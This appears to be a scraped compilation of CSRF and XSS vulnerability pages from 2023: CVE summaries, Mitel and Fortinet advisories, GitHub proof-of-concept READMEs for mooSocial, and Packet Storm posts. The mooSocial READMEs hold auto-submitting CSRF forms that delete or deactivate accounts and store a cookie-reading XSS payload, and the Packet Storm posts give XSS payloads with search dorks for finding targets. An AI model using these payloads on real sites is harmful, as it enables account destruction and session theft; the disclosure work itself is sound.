Grocy <= 4.0.2 is vulnerable to Cross Site Request Forgery (CSRF).

CVE-2023-42270

Italia Mediasky CMS version 2.0 suffers from a cross site request forgery vulnerability.

Italia Mediasky CMS 2.0 Cross Site Request Forgery

A flaw was found in Quay. Cross-site request forgery (CSRF) attacks force a user to perform unwanted actions in an application. During the pentest, it was detected that the config-editor page is vulnerable to CSRF. The config-editor page is used to configure the Quay instance. By coercing the victim’s browser into sending an attacker-controlled request from another domain, it is possible to reconfigure the Quay instance (including adding users with admin privileges).

'2238908?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-4959: Invalid Bug ID

Cross Site Scripting vulnerability in mooSocial mooSocial Software 3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

\# CVE-2023-40869
Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit\_menu, copuon, and group\_categorias functions

XSS STORE via CSRF.

#Paths Affected
http://admin-socialcommerce.moosocial.com/admin/group/group\_categories
http://admin-socialcommerce.moosocial.com/admin/coupon/
http://admin-socialcommerce.moosocial.com/admin/menu/manage/edit\_menu/6

Poc:

1 - Make a file with this HTML and with and include XSS PAYLOAD

<html>
  <body>
    <form action="http://admin-socialcommerce.moosocial.com/admin/group/group\_categories/save" method="POST">
      <input type="hidden" name="data&#91;id&#93;" value="" />
      <input type="hidden" name="data&#91;name&#93;" value="test&quot;&gt;&lt;img&#32;src&#61;a&#32;onerror&#61;alert&#40;document&#46;cookie&#41;&gt;test" />   ##payload in this example and encoded : test"><img src=a onerror=alert(document.cookie)>test
      <input type="hidden" name="data&#91;type&#93;" value="Group" />
      <input type="hidden" name="data&#91;header&#93;" value="0" />
      <input type="hidden" name="data&#91;header&#93;" value="1" />
      <input type="hidden" name="data&#91;parent&#95;id&#93;" value="0" />
      <input type="hidden" name="data&#91;description&#93;" value="" />
      <input type="hidden" name="data&#91;active&#93;" value="0" />
      <input type="hidden" name="data&#91;active&#93;" value="1" />
      <input type="hidden" name="data&#91;everyone&#93;" value="0" />
      <input type="hidden" name="data&#91;everyone&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms\[0\].submit();
    </script>
  </body>
</html>

2 - Example test.html

3 - Send to the victim

4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click the code will inject a payload and will be store at the DataBase

**About**

Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 allows a remote attacker to execute arbitrary code via a crafted script to the edit\_menu, copuon, and group\_categorias functions

**Resources**

Readme

Activity

**Stars**

**0** stars

**Watchers**

**1** watching

**Forks**

**0** forks

CVE-2023-40869: GitHub - MinoTauro2020/CVE-2023-40869: Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 allows a remote attacker to execute arbitrary code via a crafted script to the edit_me

Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

\# CVE-2023-40868

 Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.
 
The vulnerability is a Cross-Site Request Forgery (CSRF) vulnerability in the mooSocial MooSocial Software v.Demo application. A CSRF vulnerability occurs when a malicious actor can trick a victim into performing an action that they did not intend to perform. In this case, the malicious actor could trick the victim into clicking on a link or opening a file that contains malicious code. This code could then be used to delete the victim's account or deactivate their account.

POC

 1 - Make an file with with this CODE and SAVE in HTML 
 Attack Delete Account

 <html>
  <body>
    <form action="https://socialcommerce.moosocial.com/users/delete\_account">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms\[0\].submit();
    </script>
  </body>
</html>

OR Make an file with this CODE and SAVE in HTML
Attack Deactivate Account

<html>
  <body>
    <form action="https://socialcommerce.moosocial.com/users/deactivate">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms\[0\].submit();
    </script>
  </body>
</html>

2 - Example test.html

3 - Send to the victim

4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click at the button
the code will changes in his actually session.

CVE-2023-40868: GitHub - MinoTauro2020/CVE-2023-40868: Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Dea

A vulnerability in the Edge Gateway component of Mitel MiVoice Connect through 19.3 SP3 (22.24.5800.0) could allow an unauthenticated attacker to perform a Cross Site Request Forgery (CSRF) attack due to insufficient request validation. A successful exploit could allow an attacker to provide a modified URL, potentially enabling them to modify system configuration settings.

**Mitel Product Security Advisory 23-0014****MiVoice Connect Edge Gateway Cross Site Request Forgery (CSRF) Vulnerability**

Advisory ID: 23-0014

Publish Date: 2023-08-23

Last Updated: 2023-08-23

Revision: 1.0

**Summary**

A Cross Site Request Forgery (CSRF) vulnerability has been identified in MiVoice Connect Edge Gateway which if successfully exploited could allow an unauthenticated attacker to provide a modified URL, potentially enabling them to modify system configuration settings.

Mitel is recommending customers with affected product versions update to the latest release.

Credit is given to Ken Pyle and Jahmil Williams of CYBIR for highlighting these issues and bringing these to our attention.

**Affected Products**

Product Name

Product Version

Security Bulletin

Last Updated

MiVoice Connect

19.3 SP3 HF1 (22.24.6900.0) and earlier

23\-0014\-001

2023\-08\-23

**Risk Assessment**

The risk of this vulnerability is rated as medium. Refer to the product Security Bulletin(s) for additional statements regarding risk.

**Mitigation / Recommended Action**

Mitel has issued new releases of the affected software. Customers are advised to update their software to the latest versions.

For additional information, contact Product Support.

**Related CVEs / CWEs / Advisories**

CVE-2023-39285

**Revision History**

Version

Date

Description

1.0

2023\-08\-23

Initial version

CVE-2023-39285: MiVoice Connect Edge Gateway Cross Site Request Forgery (CSRF) Vulnerability

A vulnerability in the Connect Mobility Router component of Mitel MiVoice Connect through 9.6.2304.102 could allow an unauthenticated attacker to perform a Cross Site Request Forgery (CSRF) attack due to insufficient request validation. A successful exploit could allow an attacker to provide a modified URL, potentially enabling them to modify system configuration settings.

**Mitel Product Security Advisory 23-0015****MiVoice Connect Mobility Router Cross Site Request Forgery (CSRF) Vulnerability**

Advisory ID: 23-0015

Publish Date: 2023-08-23

Last Updated: 2023-08-23

Revision: 1.0

**Summary**

A Cross Site Request Forgery (CSRF) vulnerability has been identified in MiVoice Connect Mobility Router which if successfully exploited, could allow an attacker to provide a modified URL, potentially enabling them to modify system configuration settings.

Mitel is recommending customers with affected product versions update to the latest release. 

Credit is given to Ken Pyle and Jahmil Williams of CYBIR for highlighting these issues and bringing these to our attention.

**Affected Products**

Product Name

Product Version

Security Bulletin

Last Updated

Connect Mobility Router

9.6.2307.103 and earlier

23\-0015\-001

2023\-08-23

**Risk Assessment**

The risk of this vulnerability is rated as medium. Refer to the product Security Bulletin(s) for additional statements regarding risk.

**Mitigation / Recommended Action**

Mitel has issued new releases of the affected software. Customers are advised to update their software to the latest versions.

For additional information, contact Product Support.

**Related CVEs / CWEs / Advisories**

CVE-2023-39286

**Revision History**

Version

Date

Description

1.0

2023\-08-23

Initial version

CVE-2023-39286: MiVoice Connect Mobility Router Cross Site Request Forgery (CSRF) Vulnerability

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

**ImgHosting 1.3 Cross Site Scripting**

Posted Sep 14, 2023

Authored by indoushka

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 8c169afaf39b32fa5c563194367feecff6f19735b337600d64caa7b0f3c6b6a3

Download | Favorite | View

**ImgHosting 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.3 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://www.127.0.0.1/pikhostingcom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,202)
*   Arbitrary (16,255)
*   BBS (2,859)
*   Bypass (1,744)
*   CGI (1,027)
*   Code Execution (7,302)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,535)
*   Encryption (2,371)
*   Exploit (52,098)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (894)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,707)
*   Perl (1,423)
*   PHP (5,153)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,859)
*   Root (3,591)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,897)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,411)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,829)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,999)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,835)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,701)
*   Mac OS X (687)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,853)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,907)
*   UNIX (9,308)
*   UnixWare (186)
*   Windows (6,585)
*   Other

ImgHosting 1.3 Cross Site Scripting

A protection mechanism failure in Fortinet FortiWeb 7.2.0 through 7.2.1, 7.0.0 through 7.0.6, 6.4.0 through 6.4.3, 6.3.6 through 6.3.23 allows attacker to execute unauthorized code or commands via specially crafted HTTP requests.

** PSIRT Advisories**

**FortiWeb - Insufficient protections against XSS and CSRF**

**Summary**

A protection mechanism failure \[CWE-693\] vulnerability in FortiWeb may allow an attacker to bypass XSS and CSRF protections.

**Affected Products**

FortiWeb version 7.2.0 through 7.2.1  
FortiWeb version 7.0.0 through 7.0.6  
FortiWeb 6.4 all versions  
FortiWeb 6.3 all versions

**Solutions**

Please upgrade to FortiWeb version 7.2.2 or above  
Please upgrade to FortiWeb version 7.0.7 or above

**Acknowledgement**

Internally discovered and reported by Gwendal Guégniaud of Fortinet Product Security team.

**Timeline**

2023-09-05: Initial publication

CVE-2023-34984: Fortiguard

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

Posted Sep 12, 2023

Authored by indoushka

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | bd48e4a98638b72cd97b9bc442df28c3737e9b1208d03e5a4a7f58660e0bf243

Download | Favorite | View

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : KALIMATAN GMS V1.0.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://teppa.kaltimprov.go.id/                                                                                     |  | # Dork      : inurl:/front/grafik.php?tahun=                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : <script>alert(/indoushka/);</script>[+] http://Targetteppa.kaltimprovgoid/front/grafik.php?tahun=2018&bulan=%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,177)
*   Arbitrary (16,247)
*   BBS (2,859)
*   Bypass (1,743)
*   CGI (1,027)
*   Code Execution (7,301)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,519)
*   Encryption (2,371)
*   Exploit (52,086)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (892)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,704)
*   Perl (1,423)
*   PHP (5,152)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,852)
*   Root (3,590)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,895)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,409)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,825)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,994)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,833)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,676)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,841)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,896)
*   UNIX (9,306)
*   UnixWare (186)
*   Windows (6,584)
*   Other

Tag

#csrf